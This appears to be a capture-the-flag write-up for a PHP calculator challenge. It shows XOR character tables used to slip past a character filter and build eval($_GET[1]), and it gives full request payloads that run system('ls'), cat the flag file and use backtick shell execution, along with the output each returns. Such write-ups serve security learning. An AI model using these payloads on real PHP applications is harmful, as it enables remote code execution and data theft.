############### Solution 1: phpfuck ###############

python phpfuck_characters_1_xor.py
	('0'^'~'):N
	('0'^'^'):n
	('0'^'|'):L
	('1'^'~'):O
	('1'^'^'):o
	('1'^'|'):M
	('2'^'^'):l
	('3'^'^'):m
	('4'^'~'):J
	('4'^'^'):j
	('4'^'|'):H
	('5'^'~'):K
	('5'^'^'):k
	('5'^'|'):I
	('6'^'^'):h
	('7'^'^'):i
	('8'^'~'):F
	('8'^'^'):f
	('8'^'|'):D
	('9'^'~'):G
	('9'^'^'):g
	('9'^'|'):E
	('+'^'~'):U
	('+'^'^'):u
	('+'^'|'):W
	('-'^'~'):S
	('-'^'^'):s
	('-'^'|'):Q
	('*'^'~'):T
	('*'^'^'):t
	('*'^'|'):V
	('/'^'^'):q
	('('^'^'):v
	(')'^'^'):w
	('.'^'~'):P
	('.'^'^'):p
	('.'^'|'):R
	('~'^'&'):X
	('^'^'&'):x
	('|'^'&'):Z

php phpfuck_characters_2_xor.py
	('0'^'0'^'0'):0
	('0'^'0'^'1'):1
	('0'^'0'^'2'):2
	('0'^'0'^'3'):3
	('0'^'0'^'4'):4
	('0'^'0'^'5'):5
	('0'^'0'^'6'):6
	('0'^'0'^'7'):7
	('0'^'0'^'8'):8
	('0'^'0'^'9'):9
	('0'^'0'^'+'):+
	('0'^'0'^'-'):-
	('0'^'0'^'*'):*
	('0'^'0'^'/'):/
	('0'^'0'^'('):(
	('0'^'0'^')'):)
	('0'^'0'^'.'):.
	('0'^'0'^'~'):~
	('0'^'0'^'^'):^
	('0'^'0'^'|'):|
	('0'^'0'^'&'):&
	('0'^'1'^'^'):_
	('0'^'2'^'&'):$
	('0'^'3'^'^'):]
	('0'^'4'^'~'):z
	('0'^'4'^'^'):Z
	('0'^'4'^'|'):x
	('0'^'5'^'^'):[
	('0'^'5'^'|'):y
	('0'^'6'^'^'):X
	('0'^'7'^'^'):Y
	('0'^'8'^'~'):v
	('0'^'8'^'^'):V
	('0'^'8'^'|'):t
	('0'^'9'^'~'):w
	('0'^'9'^'^'):W
	('0'^'9'^'|'):u
	('0'^'+'^'~'):e
	('0'^'+'^'^'):E
	('0'^'+'^'|'):g
	('0'^'-'^'~'):c
	('0'^'-'^'^'):C
	('0'^'-'^'|'):a
	('0'^'*'^'~'):d
	('0'^'*'^'^'):D
	('0'^'*'^'|'):f
	('0'^'/'^'^'):A
	('0'^'('^'^'):F
	('0'^')'^'^'):G
	('0'^'.'^'|'):b
	('0'^'~'^'&'):h
	('0'^'^'^'&'):H
	('0'^'|'^'&'):j
	('1'^'-'^'^'):B
	('1'^'~'^'&'):i
	('1'^'^'^'&'):I
	('1'^'|'^'&'):k
	('2'^'8'^'^'):T
	('2'^'9'^'^'):U
	('2'^'^'^'&'):J
	('3'^'^'^'&'):K
	('4'^'8'^'~'):r
	('4'^'8'^'^'):R
	('4'^'8'^'|'):p
	('4'^'9'^'~'):s
	('4'^'9'^'^'):S
	('4'^'9'^'|'):q
	('4'^'~'^'&'):l
	('4'^'^'^'&'):L
	('4'^'|'^'&'):n
	('5'^'~'^'&'):m
	('5'^'^'^'&'):M
	('5'^'|'^'&'):o
	('6'^'8'^'^'):P
	('6'^'9'^'^'):Q
	('6'^'^'^'&'):N
	('7'^'^'^'&'):O
	

phpinfo()
	('.'^'^').('6'^'^').('.'^'^').('7'^'^').('0'^'^').('8'^'^').('1'^'^')
	=> ('.6.7081'^'^^^^^^^')()

One time XOR is not enough to create more complex payload such as 'eval($_GET[1])'

Use 2 times XOR (php phpfuck_characters_2_xor.py)

eval
	e: ('0'^'+'^'~')
	v: ('0'^'8'^'~')
	a: ('0'^'-'^'|')
	l: ('4'^'~'^'&')

	('0004'^'+8-~'^'~~|&')

$_GET[1]
	$: ('0'^'2'^'&')
	_: ('0'^'1'^'^')
	G: ('0'^')'^'^')
	E: ('0'^'+'^'^')
	T: ('2'^'8'^'^')
	[: ('0'^'5'^'^')
	1: ('0'^'0'^'1')
	]: ('0'^'3'^'^')

	('00002000'^'21)+8503'^'&^^^^^1^')

# calc=$_GET[1]&1=a
/?calc=('00002000'^'21)%2b8503'^'%26^^^^^1^')&1=a
	Result: a

()
	(: ('0'^'0'^'(')
	): ('0'^'0'^')')

# calc=eval($_GET[1])
('00040000020000'^'+8-~021)+85030'^'~~|&(&^^^^^1^)')

/?calc=('00040000020000'^'%2b8-~021)%2b85030'^'~~|%26(%26^^^^^1^)')&1=system('ls')%3b
	Result: fl4g1sH3re.php
	index.php

/?calc=('00040000020000'^'%2b8-~021)%2b85030'^'~~|%26(%26^^^^^1^)')&1=system('cat+fl4g1sH3re.php')%3b
	Result: <?php

	$flagflagflagflagflagflag = "TetCTF{_D0_Y0u_Know_H0w_T0_C4lculat3_1337?_viettel_*100*817632506233949#}";

	?>

############### Solution 2 ###############
`hd *`
('0'^'.'^'~').('6'^'^').('0'^'*'^'~').('~'^'^').'*'.('0'^'.'^'~')

# `cat *`
calc='+99999+'^'5|~|+95'^'~&&12*~'

calc=`$_GET[1]`&1=ls